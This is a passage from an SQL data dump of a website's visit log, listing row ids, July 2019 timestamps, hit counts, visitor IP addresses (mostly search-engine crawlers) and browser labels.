,'chrome'),(433637,1562444805,1,1,0,0,'40.77.167.105','other'),(433638,1562445768,2,2,0,0,'5.45.207.79','other'),(433639,1562445819,1,1,0,0,'40.77.167.105','other'),(433640,1562446026,1,1,0,0,'178.154.244.11','other'),(433641,1562446039,1,1,0,0,'207.46.13.50','other'),(433642,1562446159,1,1,0,0,'66.249.66.220','chrome'),(433643,1562446187,1,1,0,0,'66.249.66.218','chrome'),(433644,1562446797,1,1,0,0,'66.249.66.132','chrome'),(433645,1562447082,2,2,0,0,'207.46.13.146','other'),(433646,1562447544,1,1,0,0,'66.249.66.218','chrome'),(433647,1562447913,1,1,0,0,'40.77.167.105','other'),(433648,1562448273,1,1,0,0,'207.46.13.50','other'),(433649,1562448627,2,2,0,0,'207.46.13.146','other'),(433650,1562448635,1,1,0,0,'66.249.66.220','chrome'),(433651,1562449541,2,2,0,0,'178.154.244.11','other'),(433652,1562449553,1,1,0,0,'207.46.13.96','other'),(433653,1562449571,1,1,0,0,'66.249.66.218','chrome'),(433654,1562449792,1,1,0,0,'66.249.66.220','chrome'),(433655,1562451209,1,1,0,0,'66.249.66.222','chrome'),(433656,1562451731,3,3,0,0,'207.46.13.146','other'),(433657,1562452488,2,2,0,0,'207.46.13.50','other'),(433658,1562452938,2,2,0,0,'8.29.198.25','other'),(433659,1562453166,1,1,0,0,'207.46.13.96','other'),(433660,1562453348,2,2,0,0,'178.154.244.11','other'),(433661,1562453461,1,1,0,0,'40.77.167.105','other'),(433662,1562453486,1,1,0,0,'207.46.13.50','other'),(433663,1562453516,1,1,0,0,'66.249.66.220','chrome'),(433664,1562453532,3,3,0,0,'66.249.66.218','chrome'),(433665,1562454027,1,1,0,0,'157.55.39.167','other'),(433666,1562454208,1,1,0,0,'40.77.167.8','other'),(433667,1562454455,1,1,0,0,'5.45.207.79','other'),(433668,1562455382,1,1,0,0,'66.249.66.220','chrome'),(433669,1562455658,1,1,0,0,'40.77.167.8','other'),(433670,1562456018,1,1,0,0,'5.45.207.79','other'),(433671,1562456668,1,1,0,0,'207.46.13.50','other'),(433672,1562456917,2,2,0,0,'157.55.39.167','other'),(433673,1562458722,2,2,0,0,'40.77.167.150','other'),(433674,1562458768,2,2,0,0,'207.46.13.50','other'),(433675,1562459193,3,3,0,0,'157.55.39.167','other'),(433676,1562460126,1,1,0,0,'5.45.207.79','other'),(433677,1562460345,1,1,0,0,'157.55.39.167','other'),(433678,1562460938,1,1,0,0,'207.46.13.50','other'),(433679,1562461783,1,1,0,0,'157.55.39.167','other'),(433680,1562462258,1,1,0,0,'40.77.167.150','other'),(433681,1562462521,1,1,0,0,'207.46.13.146','other'),(433682,1562462685,1,1,0,0,'157.55.39.167','other'),(433683,1562463269,1,1,0,0,'213.180.203.17','other'),(433684,1562463634,1,1,0,0,'157.55.39.167','other'),(433685,1562463742,2,2,0,0,'93.119.227.19','firefox'),(433686,1562463781,2,2,0,0,'8.29.198.26','other'),(433687,1562463829,2,2,0,0,'207.46.13.50','other'),(433688,1562464064,1,1,0,0,'66.249.66.220','chrome'),(433689,1562464713,1,1,0,0,'157.55.39.167','other'),(433690,1562466112,1,1,0,0,'207.46.13.50','other'),(433691,1562466885,1,1,0,0,'5.45.207.19','other'),(433692,1562466986,2,2,0,0,'207.46.13.146','other'),(433693,1562467155,2,2,0,0,'207.46.13.50','other'),(433694,1562468526,1,1,0,0,'40.77.167.111','other'),(433695,1562468530,3,3,0,0,'40.77.167.150','other'),(433696,1562468852,1,1,0,0,'157.55.39.67','other'),(433697,1562468929,2,2,0,0,'66.249.66.220','chrome'),(433698,1562469276,3,3,0,0,'157.55.39.221','other'),(433699,1562469790,2,2,0,0,'40.77.167.111','other'),(433700,1562470466,2,2,0,0,'157.55.39.221','other'),(433701,1562470561,2,2,0,0,'66.249.66.218','chrome'),(433702,1562471652,2,2,0,0,'66.249.66.218','chrome'),(433703,1562471821,2,2,0,0,'40.77.167.111','other'),(433704,1562472496,1,1,0,0,'178.154.244.11','other'),(433705,1562472668,1,1,0,0,'40.77.167.150','other'),(433706,1562472892,1,1,0,0,'185.154.72.12','other'),(433707,1562473730,2,2,0,0,'157.55.39.221','other'),(433708,1562474157,1,1,0,0,'157.55.39.110','other'),(433709,1562474321,1,1,0,0,'40.77.167.150','other'),(433710,1562474621,2,2,0,0,'8.29.198.25','other'),(433711,1562474743,1,1,0,0,'157.55.39.221','other'),(433712,1562475348,1,1,0,0,'141.8.142.103','other'),(433713,1562476284,1,1,0,0,'157.55.39.221','other'),(433714,1562477342,1,1,0,0,'207.46.13.157','other'),(433715,1562478833,1,1,0,0,'180.76.15.33','other'),(433716,1562479702,1,1,0,0,'91.209.11.236','other'),(433717,1562480367,1,1,0,0,'40.77.167.69','other'),(433718,1562481842,1,1,0,0,'5.45.207.79','other'),(433719,1562482535,1,1,0,0,'40.77.167.69','other'),(433720,1562484124,1,1,0,0,'66.249.66.218','chrome'),(433721,1562484306,1,1,0,0,'157.55.39.221','other'),(433722,1562484310,1,1,0,0,'40.77.167.69','other'),(433723,1562484315,1,1,0,0,'40.77.167.163','other'),(433724,1562484768,1,1,0,0,'141.8.142.38','other'),(433725,1562485461,1,1,0,0,'8.29.198.27','other'),(433726,1562485831,1,1,0,0,'8.29.198.25','other'),(433727,1562487166,1,1,0,0,'66.249.66.220','chrome'),(433728,1562487290,2,2,0,0,'157.55.39.221','other'),(433729,1562487470,1,1,0,0,'40.77.167.69','other'),(433730,1562487583,1,1,0,0,'87.250.224.47','other'),(433731,1562487929,1,1,0,0,'178.154.244.65','other'),(433732,1562488464,1,1,0,0,'66.249.66.218','chrome'),(433733,1562488895,1,1,0,0,'66.249.66.130','chrome'),(433734,1562489567,1,1,0,0,'207.46.13.144','other'),(433735,1562489712,1,1,0,0,'40.77.167.69','other'),(433736,1562490702,1,1,0,0,'5.45.207.19','other'),(433737,1562491513,1,1,0,0,'40.77.167.69','other'),(433738,1562491820,1,1,0,0,'66.249.66.222','chrome'),(433739,1562492792,1,1,0,0,'5.45.207.79','other'),(433740,1562492864,1,1,0,0,'157.55.39.221','other'),(433741,1562492940,2,2,0,0,'157.55.39.109','other'),(433742,1562493004,1,1,0,0,'46.211.132.165','chrome'),(433743,1562493446,1,1,0,0,'60.191.38.77','firefox'),(433744,1562494075,1,1,0,0,'40.77.167.69','other'),(433745,1562494160,1,1,0,0,'46.211.134.36','other'),(433746,1562494335,1,1,0,0,'109.74.154.72','chrome'),(433747,1562494714,1,1,0,0,'157.55.39.221','other'),(433748,1562495410,1,1,0,0,'123.126.113.112','other'),(433749,1562496175,2,2,0,0,'157.55.39.109','other'),(433750,1562496293,1,1,0,0,'8.29.198.26','other'),(433751,1562496629,1,1,0,0,'207.46.13.144','other'),(433752,1562496693,1,1,0,0,'8.29.198.27','other'),(433753,1562496707,1,1,0,0,'60.191.38.77','firefox'),(433754,1562496958,1,1,0,0,'178.154.244.11','other'),(433755,1562497087,1,1,0,0,'157.55.39.109','other'),(433756,1562498622,2,2,0,0,'40.77.167.69','other'),(433757,1562498640,1,1,0,0,'162.242.209.243','chrome'),(433758,1562500058,1,1,0,0,'66.249.66.218','chrome'),(433759,1562500380,2,2,0,0,'207.46.13.111','other'),(433760,1562500414,2,2,0,0,'66.249.66.220','chrome'),(433761,1562500722,1,1,0,0,'157.55.39.159','other'),(433762,1562501838,1,1,0,0,'66.249.66.130','chrome'),(433763,1562502497,1,1,0,0,'87.250.224.65','other'),(433764,1562502694,1,1,0,0,'195.10.210.70','chrome'),(433765,1562502702,1,1,0,0,'40.77.167.181','other'),(433766,1562503953,1,1,0,0,'66.249.66.132','chrome'),(433767,1562504088,1,1,0,0,'66.249.66.218','chrome'),(433768,1562504282,2,2,0,0,'40.77.167.222','other'),(433769,1562504387,1,1,0,0,'40.77.167.181','other'),(433770,1562504593,2,2,0,0,'66.249.66.130','chrome'),(433771,1562505074,1,1,0,0,'46.211.47.226','chrome'),(433772,1562505149,1,1,0,0,'213.180.203.61','other'),(433773,1562505371,3,3,0,0,'157.55.39.109','other'),(433774,1562505581,2,2,0,0,'40.77.167.181','other'),(433775,1562505586,2,2,0,0,'40.77.167.222','other'),(433776,1562505673,1,1,0,0,'82.193.114.254','other'),(433777,1562507140,1,1,0,0,'8.29.198.27','other'),(433778,1562507413,1,1,0,0,'66.249.66.220','chrome'),(433779,1562507453,1,1,0,0,'66.249.66.218','chrome'),(433780,1562507528,1,1,0,0,'8.29.198.26','other'),(433781,1562507864,1,1,0,0,'66.249.66.130','chrome'),(433782,1562508709,1,1,0,0,'66.249.66.218','chrome'),(433783,1562509102,1,1,0,0,'40.77.167.181','other'),(433784,1562509493,1,1,0,0,'66.249.66.222','chrome'),(433785,1562510060,1,1,0,0,'66.249.66.132','chrome'),(433786,1562510172,3,3,0,0,'66.249.66.128','chrome'),(433787,1562510396,1,1,0,0,'40.77.167.222','other'),(433788,1562510579,2,2,0,0,'207.46.13.137','other'),(433789,1562510747,2,2,0,0,'40.77.167.181','other'),(433790,1562512041,1,1,0,0,'40.77.167.222','other'),(433791,1562512915,1,1,0,0,'188.32.136.113','msie'),(433792,1562513075,1,1,0,0,'40.77.167.181','other'),(433793,1562514433,1,1,0,0,'207.46.13.137','other'),(433794,1562516546,1,1,0,0,'157.55.39.109','other'),(433795,1562516618,3,3,0,0,'40.77.167.222','other'),(433796,1562516732,1,1,0,0,'178.154.244.11','other'),(433797,1562516981,1,1,0,0,'99.229.205.200','other'),(433798,1562517156,1,1,0,0,'5.45.207.76','other'),(433799,1562517198,1,1,0,0,'178.154.244.65','other'),(433800,1562517980,1,1,0,0,'8.29.198.25','other'),(433801,1562518288,1,1,0,0,'66.249.66.128','chrome'),(433802,1562518388,1,1,0,0,'8.29.198.26','other'),(433803,1562518433,1,1,0,0,'40.77.167.218','other'),(433804,1562518675,1,1,0,0,'40.77.167.222','other'),(433805,1562519425,1,1,0,0,'178.154.244.65','other'),(433806,1562519944,13,13,0,0,'144.76.96.236','other'),(433807,1562520753,1,1,0,0,'66.249.66.128','chrome'),(433808,1562520839,134,134,0,0,'178.63.13.154','other'),(433809,1562520915,1,1,0,0,'66.249.66.222','chrome'),(433810,1562521222,2,2,0,0,'207.46.13.79','other'),(433811,1562522088,1,1,0,0,'37.9.113.148','other'),(433812,1562522229,1,1,0,0,'91.209.11.236','other'),(433813,1562522273,1,1,0,0,'66.249.66.218','chrome'),(433814,1562522394,1,1,0,0,'66.249.66.220','chrome'),(433815,1562523145,1,1,0,0,'62.4.14.198','firefox'),(433816,1562523455,1,1,0,0,'207.46.13.79','other'),(433817,1562523685,2,2,0,0,'157.55.39.228','other'),(433818,1562523700,1,1,0,0,'207.46.13.184','other'),(433819,1562525666,2,2,0,0,'157.55.39.228','other'),(433820,1562525891,1,1,0,0,'207.46.13.184','other'),(433821,1562526378,1,1,0,0,'40.77.167.154','other'),(433822,1562527097,1,1,0,0,'207.46.13.184','other'),(433823,1562527791,1,1,0,0,'5.45.207.76','other'),(433824,1562528084,1,1,0,0,'92.113.156.60','chrome'),(433825,1562528605,1,1,0,0,'40.77.167.154','other'),(433826,1562528763,1,1,0,0,'178.154.244.11','other'),(433827,1562528829,2,2,0,0,'8.29.198.27','other'),(433828,1562529184,1,1,0,0,'207.46.13.184','other'),(433829,1562530316,1,1,0,0,'66.249.66.220','chrome'),(433830,1562530460,2,2,0,0,'207.46.13.184','other'),(433831,1562530724,1,1,0,0,'207.46.13.79','other'),(433832,1562530771,1,0,1,0,'66.249.66.222',''),(433833,1562530784,2,0,2,0,'66.249.66.218',''),(433834,1562530791,1,1,0,0,'66.249.66.218','chrome'),(433835,1562531043,1,1,0,0,'93.74.253.83','chrome'),(433836,1562531819,1,1,0,0,'66.249.66.222','chrome'),(433837,1562531856,1,1,0,0,'178.154.244.11','other'),(433838,1562532118,3,3,0,0,'91.196.178.81','chrome'),(433839,1562532171,1,1,0,0,'193.106.30.98','chrome'),(433840,1562532291,1,1,0,0,'91.196.178.85','chrome'),(433841,1562532583,1,1,0,0,'40.77.167.154','other'),(433842,1562532775,2,2,0,0,'69.58.178.59','other'),(433843,1562533043,1,1,0,0,'212.83.146.233','firefox'),(433844,1562534368,1,1,0,0,'109.207.199.224','chrome'),(433845,1562534637,2,2,0,0,'66.249.66.130','chrome'),(433846,1562534639,1,1,0,0,'66.249.66.218','chrome'),(433847,1562535316,1,1,0,0,'157.55.39.107','other'),(433848,1562535332,1,1,0,0,'95.108.181.83','other'),(433849,1562535736,1,1,0,0,'87.250.224.47','other'),(433850,1562536001,1,1,0,0,'5.45.207.8','other'),(433851,1562536048,1,1,0,0,'207.46.13.184','other'),(433852,1562536136,1,1,0,0,'157.55.39.228','other'),(433853,1562536631,1,1,0,0,'40.77.167.154','other'),(433854,1562536930,1,1,0,0,'66.249.66.220','chrome'),(433855,1562537583,2,2,0,0,'157.55.39.107','other'),(433856,1562538407,1,1,0,0,'213.180.203.17','other'),(433857,1562538539,1,1,0,0,'95.108.181.54','other'),(433858,1562538651,2,1,1,0,'66.249.66.218',''),(433859,1562538768,1,1,0,0,'66.249.66.222','chrome'),(433860,1562538776,2,2,0,0,'66.249.66.220','chrome'),(433861,1562538946,1,1,0,0,'40.77.167.88','other'),(433862,1562539467,1,1,0,0,'157.55.39.228','other'),(433863,1562539673,2,2,0,0,'8.29.198.26','other'),(433864,1562540036,1,1,0,0,'95.108.213.4','other'),(433865,1562540469,1,1,0,0,'178.154.200.48','other'),(433866,1562541110,2,2,0,0,'157.55.39.228','other'),(433867,1562541153,1,1,0,0,'66.249.66.220','chrome'),(433868,1562541453,2,2,0,0,'178.154.244.11','other'),(433869,1562541615,1,1,0,0,'95.108.181.75','other'),(433870,1562541935,1,1,0,0,'207.46.13.2','other'),(433871,1562542443,1,1,0,0,'157.55.39.228','other'),(433872,1562542444,1,1,0,0,'157.55.39.107','other'),(433873,1562543129,2,2,0,0,'207.46.13.2','other'),(433874,1562543422,1,1,0,0,'207.46.13.157','other'),(433875,1562543605,1,1,0,0,'93.119.227.34','chrome'),(433877,1562544125,1,1,0,0,'157.55.39.107','other'),(433878,1562544289,1,1,0,0,'157.55.39.228','other'),(433879,1562544668,1,1,0,0,'64.246.161.30','firefox'),(433880,1562546431,1,1,0,0,'66.249.66.222','chrome'),(433881,1562546627,1,1,0,0,'66.249.66.218','chrome'),(433882,1562546702,1,1,0,0,'40.77.167.212','other'),(433883,1562547457,1,1,0,0,'34.220.139.73','other'),(433884,1562547817,2,2,0,0,'40.77.167.27','other'),(433885,1562548130,3,3,0,0,'173.208.206.50','other'),(433886,1562548153,2,2,0,0,'204.12.197.234','other'),(433887,1562549714,1,1,0,0,'157.55.39.218','other'),(433888,1562549777,1,1,0,0,'40.77.167.212','other'),(433889,1562549814,1,1,0,0,'213.180.203.17','other'),(433890,1562549962,1,1,0,0,'141.8.142.81','other'),(433891,1562550011,1,1,0,0,'157.55.39.99','other'),(433892,1562550017,1,1,0,0,'40.77.167.27','other'),(433893,1562550035,1,1,0,0,'178.154.244.11','other'),(433894,1562550513,2,2,0,0,'8.29.198.25','other'),(433895,1562550569,1,1,0,0,'66.249.66.220','chrome'),(433896,1562550793,1,1,0,0,'157.55.39.91','other'),(433897,1562552695,1,1,0,0,'178.154.244.11','other'),(433898,1562553227,1,1,0,0,'207.46.13.59','other'),(433899,1562553529,1,1,0,0,'207.46.13.150','other'),(433900,1562553768,1,1,0,0,'207.46.13.101','other'),(433901,1562554170,1,1,0,0,'52.162.161.148','other'),(433902,1562554601,1,1,0,0,'207.46.13.150','other'),(433903,1562555338,3,3,0,0,'178.154.244.11','other'),(433904,1562555566,1,1,0,0,'40.77.167.212','other'),(433905,1562556167,1,1,0,0,'207.46.13.150','other'),(433906,1562557309,1,1,0,0,'195.128.17.206','other'),(433907,1562557471,1,1,0,0,'207.46.13.150','other'),(433908,1562558150,1,1,0,0,'193.106.30.98','chrome'),(433909,1562558485,1,1,0,0,'157.55.39.2','other'),(433910,1562558680,1,1,0,0,'207.46.13.150','other'),(433911,1562558785,1,1,0,0,'5.45.207.19','other'),(433912,1562558851,1,1,0,0,'178.154.244.11','other'),(433913,1562559289,1,1,0,0,'40.77.167.212','other'),(433914,1562559648,1,1,0,0,'157.55.39.8','other'),(433915,1562560661,2,2,0,0,'40.77.167.22','other'),(433916,1562561362,1,1,0,0,'8.29.198.27','other'),(433917,1562561788,1,1,0,0,'8.29.198.26','other'),(433918,1562562328,1,1,0,0,'66.249.66.132','chrome'),(433919,1562564171,1,1,0,0,'83.170.203.202','chrome'),(433920,1562564341,1,1,0,0,'207.46.13.150','other'),(433921,1562564904,1,1,0,0,'91.196.178.177','chrome'),(433922,1562565125,1,1,0,0,'5.45.207.19','other'),(433923,1562565984,1,1,0,0,'178.154.244.11','other'),(433924,1562566709,1,1,0,0,'91.196.178.81','chrome'),(433925,1562567431,1,1,0,0,'207.46.13.41','other'),(433926,1562568345,1,1,0,0,'207.46.13.41','other'),(433927,1562569006,1,1,0,0,'157.55.39.156','other'),(433928,1562569095,1,1,0,0,'91.196.178.77','chrome'),(433929,1562569494,1,1,0,0,'178.154.244.11','other'),(433930,1562570811,2,2,0,0,'207.46.13.67','other'),(433931,1562570813,4,4,0,0,'157.55.39.8','other'),(433932,1562570818,2,2,0,0,'207.46.13.41','other'),(433933,1562570823,3,3,0,0,'157.55.39.156','other'),(433934,1562571333,1,1,0,0,'91.209.11.236','other'),(433935,1562571939,1,1,0,0,'207.46.13.41','other'),(433936,1562572060,1,1,0,0,'91.196.178.77','chrome'),(433937,1562572214,1,1,0,0,'8.29.198.27','other'),(433939,1562572227,1,1,0,0,'91.196.178.81','chrome'),(433940,1562572445,1,1,0,0,'94.153.229.229','other'),(433941,1562572560,1,1,0,0,'207.46.13.102','other'),(433942,1562572648,1,1,0,0,'8.29.198.25','other'),(433943,1562572694,1,1,0,0,'92.113.47.73','chrome'),(433944,1562572776,1,1,0,0,'92.112.249.25','chrome'),(433945,1562573052,1,1,0,0,'66.249.66.128','chrome'),(433946,1562573136,1,1,0,0,'37.9.113.103','other'),(433947,1562573162,1,1,0,0,'141.8.142.38','other'),(433948,1562573226,1,1,0,0,'91.196.178.77','chrome'),(433949,1562573580,1,1,0,0,'66.249.66.218','chrome'),(433950,1562574267,1,1,0,0,'78.111.189.51','chrome'),(433951,1562574605,1,1,0,0,'167.114.172.225','other'),(433952,1562574633,1,1,0,0,'167.114.172.225','chrome'),(433953,1562574828,1,1,0,0,'66.249.66.220','chrome'),(433954,1562576459,1,1,0,0,'40.77.167.5','other'),(433955,1562577747,1,1,0,0,'5.45.207.19','other'),(433956,1562577824,1,1,0,0,'185.110.133.17','chrome'),(433957,1562578118,1,1,0,0,'207.46.13.102','other'),(433958,1562579292,1,1,0,0,'207.46.13.102','other'),(433959,1562579364,1,1,0,0,'109.251.94.29','chrome'),(433960,1562580003,1,1,0,0,'37.9.113.148','other'),(433961,1562580666,1,1,0,0,'109.74.154.72','chrome'),(433962,1562581758,1,1,0,0,'188.163.18.115','firefox'),(433963,1562582877,1,1,0,0,'5.45.207.79','other'),(433964,1562583049,1,1,0,0,'8.29.198.25','other'),(433965,1562583441,1,1,0,0,'157.55.39.109','other'),(433966,1562583491,1,1,0,0,'8.29.198.27','other'),(433967,1562584434,1,1,0,0,'141.8.142.103','other'),(433968,1562584640,1,1,0,0,'60.191.38.77','firefox'),(433969,1562584712,1,1,0,0,'91.196.178.77','chrome'),(433970,1562585741,1,1,0,0,'178.154.244.11','other'),(433971,1562586169,1,1,0,0,'141.8.142.103','other'),(433972,1562586171,1,1,0,0,'207.46.13.107','other'),(433973,1562586531,1,1,0,0,'60.191.38.77','firefox'),(433974,1562587520,1,1,0,0,'207.46.13.107','other'),(433975,1562588110,1,1,0,0,'138.201.37.205','other'),(433976,1562588214,1,1,0,0,'91.196.177.15','chrome'),(433977,1562588733,1,0,1,0,'164.132.119.83',''),(433978,1562589081,2,2,0,0,'178.154.244.11','other'),(433979,1562589214,1,1,0,0,'157.55.39.106','other'),(433980,1562591314,1,1,0,0,'46.160.125.74','firefox'),(433981,1562591641,2,2,0,0,'207.46.13.50','other'),(433982,1562591690,1,1,0,0,'207.46.13.122','other'),(433983,1562592113,1,1,0,0,'91.196.178.77','chrome'),(433984,1562592218,1,1,0,0,'37.53.91.70','firefox'),(433985,1562593909,1,1,0,0,'8.29.198.27','other'),(433986,1562594354,1,1,0,0,'8.29.198.26','other'),(433987,1562594555,1,1,0,0,'37.9.113.148','other'),(433988,1562594830,1,1,0,0,'109.227.109.108','chrome'),(433989,1562595018,1,1,0,0,'51.77.246.205','other'),(433990,1562595111,1,1,0,0,'207.46.13.184','other'),(433991,1562596155,2,2,0,0,'130.180.208.127','chrome'),(433992,1562596341,2,2,0,0,'207.46.13.184','other'),(433993,1562597890,1,1,0,0,'157.55.39.186','other'),(433994,1562597920,1,1,0,0,'87.250.224.65','other'),(433995,1562598596,1,1,0,0,'213.180.203.17','other'),(433996,1562598623,1,1,0,0,'178.154.244.49','other'),(433997,1562599092,2,2,0,0,'157.55.39.66','other'),(433998,1562599388,1,1,0,0,'40.77.167.66','other'),(433999,1562600167,1,1,0,0,'91.196.178.92','firefox'),(434000,1562600205,1,1,0,0,'37.9.113.148','other'),(434001,1562600504,1,1,0,0,'5.45.207.79','other'),(434002,1562600979,1,1,0,0,'37.57.139.247','chrome'),(434003,1562601330,2,2,0,0,'40.77.167.16','other'),(434004,1562601467,1,1,0,0,'40.77.167.93','other'),(434005,1562602420,1,1,0,0,'40.77.167.93','other'),(434006,1562603295,1,1,0,0,'40.77.167.196','other'),(434007,1562603688,1,1,0,0,'40.77.167.93','other'),(434008,1562604674,1,1,0,0,'40.77.167.32','other'),(434009,1562604766,1,1,0,0,'8.29.198.27','other'),(434010,1562605132,1,1,0,0,'178.154.244.11','other'),(434011,1562605250,1,1,0,0,'8.29.198.26','other'),(434012,1562605575,1,1,0,0,'5.45.207.79','other'),(434013,1562606728,1,1,0,0,'40.77.167.53','other'),(434014,1562608223,1,1,0,0,'95.108.213.4','other'),(434015,1562609229,1,1,0,0,'40.77.167.132','other'),(434016,1562609416,1,1,0,0,'141.8.142.103','other'),(434017,1562609773,1,1,0,0,'178.154.244.11','other'),(434018,1562609828,1,1,0,0,'40.77.167.93','other'),(434019,1562609953,1,1,0,0,'141.8.142.108','other'),(434020,1562610264,1,1,0,0,'37.9.113.148','other'),(434021,1562610271,1,1,0,0,'178.154.171.24','other'),(434022,1562610734,2,2,0,0,'40.77.167.93','other'),(434023,1562610806,1,1,0,0,'40.77.167.32','other'),(434024,1562610965,1,1,0,0,'40.77.167.132','other'),(434025,1562611060,1,1,0,0,'91.209.157.6','chrome'),(434026,1562612260,1,1,0,0,'207.46.13.41','other'),(434027,1562612319,1,1,0,0,'95.133.238.202','chrome'),(434028,1562612471,1,1,0,0,'178.154.244.11','other'),(434029,1562613211,1,1,0,0,'5.45.207.19','other'),(434030,1562613389,2,2,0,0,'207.46.13.41','other'),(434031,1562614705,1,1,0,0,'46.211.2.239','chrome'),(434032,1562615019,2,2,0,0,'95.213.141.126','opera'),(434033,1562615293,1,1,0,0,'66.249.66.220','chrome'),(434034,1562615621,1,1,0,0,'8.29.198.25','other'),(434035,1562615731,2,2,0,0,'40.77.167.32','other'),(434036,1562616004,2,2,0,0,'207.46.13.41','other'),(434037,1562616115,1,1,0,0,'8.29.198.27','other'),(434038,1562616132,1,1,0,0,'40.77.167.132','other'),(434039,1562616279,1,1,0,0,'66.249.66.222','chrome'),(434040,1562616748,1,1,0,0,'95.134.185.103','chrome'),(434041,1562617235,1,1,0,0,'40.77.167.32','other'),(434042,1562617624,3,3,0,0,'207.46.13.41','other'),(434043,1562617887,1,1,0,0,'40.77.167.79','other'),(434044,1562618092,1,1,0,0,'91.196.178.45','chrome'),(434045,1562618429,1,1,0,0,'40.77.167.132','other'),(434046,1562618433,5,5,0,0,'40.77.167.32','other'),(434047,1562620496,1,1,0,0,'207.46.13.41','other'),(434048,1562620556,1,1,0,0,'40.77.167.32','other'),(434049,1562620627,1,1,0,0,'141.8.142.38','other'),(434050,1562621257,1,1,0,0,'178.154.244.11','other'),(434051,1562621422,2,2,0,0,'207.46.13.41','other'),(434052,1562621992,1,1,0,0,'40.77.167.32','other'),(434053,1562622694,1,1,0,0,'91.196.178.102','chrome'),(434054,1562622933,1,1,0,0,'207.46.13.41','other'),(434055,1562623194,2,2,0,0,'178.154.244.11','other'),(434056,1562623238,1,1,0,0,'180.76.15.8','other'),(434057,1562624039,1,1,0,0,'40.77.167.151','other'),(434058,1562624239,1,1,0,0,'207.46.13.41','other'),(434059,1562624712,1,1,0,0,'40.77.167.132','other'),(434060,1562625349,2,2,0,0,'207.46.13.41','other'),(434061,1562625987,1,1,0,0,'66.249.66.220','chrome'),(434062,1562626020,1,1,0,0,'207.46.13.155','other'),(434063,1562626486,1,1,0,0,'8.29.198.27','other'),(434064,1562626892,1,1,0,0,'40.77.167.132','other'),(434065,1562626964,1,1,0,0,'8.29.198.26','other'),(434066,1562627021,2,2,0,0,'5.45.207.19','other'),(434067,1562627167,1,1,0,0,'141.8.142.103','other'),(434068,1562627783,1,1,0,0,'5.45.207.79','other'),(434069,1562628025,1,1,0,0,'66.249.66.220','chrome'),(434070,1562628296,1,1,0,0,'213.180.203.9','other'),(434071,1562628454,1,1,0,0,'157.55.39.72','other'),(434072,1562628855,1,1,0,0,'213.180.203.40','other'),(434073,1562628988,1,1,0,0,'141.8.142.162','other'),(434074,1562630268,1,1,0,0,'157.55.39.72','other'),(434075,1562631817,1,1,0,0,'40.77.167.132','other'),(434076,1562632425,1,1,0,0,'40.77.167.7','other'),(434077,1562632600,1,1,0,0,'193.106.30.98','chrome'),(434078,1562633207,1,1,0,0,'172.94.102.89','chrome'),(434079,1562634939,1,1,0,0,'66.249.66.220','chrome'),(434080,1562635541,1,1,0,0,'66.249.66.218','chrome'),(434081,1562636527,1,1,0,0,'141.8.142.103','other'),(434082,1562637352,2,2,0,0,'8.29.198.25','other'),(434083,1562638483,1,1,0,0,'207.46.13.128','other'),(434084,1562639891,1,1,0,0,'66.249.66.128','chrome'),(434085,1562640296,1,1,0,0,'176.14.177.215','chrome'),(434086,1562640911,1,1,0,0,'207.46.13.220','other'),(434087,1562642237,1,1,0,0,'66.249.66.220','chrome'),(434088,1562643255,300,300,0,0,'173.234.153.122','other'),(434089,1562643905,1,1,0,0,'66.249.66.132','chrome'),(434090,1562643980,29,29,0,0,'95.91.75.233','other'),(434091,1562644007,1,1,0,0,'66.249.66.218','chrome'),(434092,1562646375,1,1,0,0,'207.46.13.205','other'),(434093,1562646728,1,1,0,0,'40.77.167.86','other'),(434094,1562647558,2,2,0,0,'40.77.167.61','other'),(434095,1562648203,1,1,0,0,'8.29.198.25','other'),(434096,1562648354,1,1,0,0,'66.249.66.222','chrome'),(434097,1562648403,1,1,0,0,'157.55.39.190','other'),(434098,1562648680,1,1,0,0,'8.29.198.27','other'),(434099,1562648836,1,1,0,0,'5.45.207.79','other'),(434100,1562648842,1,1,0,0,'37.9.113.20','other'),(434101,1562649072,1,1,0,0,'40.77.167.86','other'),(434102,1562649702,1,1,0,0,'95.108.181.96','other'),(434103,1562649804,1,1,0,0,'207.46.13.202','other'),(434104,1562649938,1,1,0,0,'91.196.178.77','chrome'),(434105,1562651159,1,1,0,0,'40.77.167.61','other'),(434106,1562653129,1,1,0,0,'91.196.177.15','firefox'),(434107,1562653692,1,1,0,0,'157.55.39.63','other'),(434108,1562654398,1,1,0,0,'66.249.66.218','chrome'),(434109,1562654546,1,1,0,0,'40.77.167.115','other'),(434110,1562654549,1,1,0,0,'5.2.77.146','other'),(434111,1562655133,1,1,0,0,'66.249.66.222','chrome'),(434112,1562656421,1,1,0,0,'5.45.207.79','other'),(434113,1562656458,1,1,0,0,'178.154.200.48','other'),(434114,1562657571,2,2,0,0,'207.46.13.197','other'),(434115,1562657575,2,2,0,0,'157.55.39.231','other'),(434116,1562657580,2,2,0,0,'157.55.39.63','other'),(434117,1562657585,1,1,0,0,'40.77.167.15','other'),(434118,1562657603,1,1,0,0,'185.76.69.18','chrome'),(434119,1562659090,1,1,0,0,'8.29.198.26','other'),(434120,1562659554,1,1,0,0,'8.29.198.25','other'),(434121,1562660219,1,1,0,0,'45.127.97.120','other'),(434122,1562661204,1,1,0,0,'157.55.39.231','other'),(434123,1562661809,1,1,0,0,'69.4.89.106','chrome'),(434125,1562662083,1,1,0,0,'193.106.30.98','chrome'),(434126,1562663574,1,1,0,0,'178.137.80.111','chrome'),(434127,1562663740,88,88,0,0,'78.46.90.53','other'),(434128,1562663784,2,2,0,0,'46.211.134.157','chrome'),(434129,1562664168,2,2,0,0,'157.55.39.63','other'),(434130,1562664591,1,0,1,0,'66.249.66.222',''),(434131,1562664902,1,1,0,0,'66.249.66.222','chrome'),(434132,1562664932,1,1,0,0,'66.249.66.220','chrome'),(434133,1562665340,1,1,0,0,'91.196.178.181','chrome'),(434134,1562665601,1,1,0,0,'78.111.190.32','chrome'),(434135,1562665941,3,3,0,0,'157.55.39.52','other'),(434136,1562666092,1,1,0,0,'66.249.66.218','chrome'),(434137,1562666460,1,1,0,0,'93.183.228.234','chrome'),(434138,1562667076,1,1,0,0,'66.249.66.130','chrome'),(434139,1562667117,1,1,0,0,'66.249.66.218','chrome'),(434140,1562667180,1,1,0,0,'141.8.142.103','other'),(434141,1562667629,1,1,0,0,'66.249.66.222','chrome'),(434142,1562667806,1,1,0,0,'40.77.167.10','other'),(434143,1562668005,4,4,0,0,'144.76.162.242','other'),(434144,1562668245,1,1,0,0,'109.74.154.72','chrome'),(434145,1562668410,1,1,0,0,'40.77.167.110','other'),(434146,1562668778,1,1,0,0,'40.77.167.159','other'),(434147,1562669052,1,1,0,0,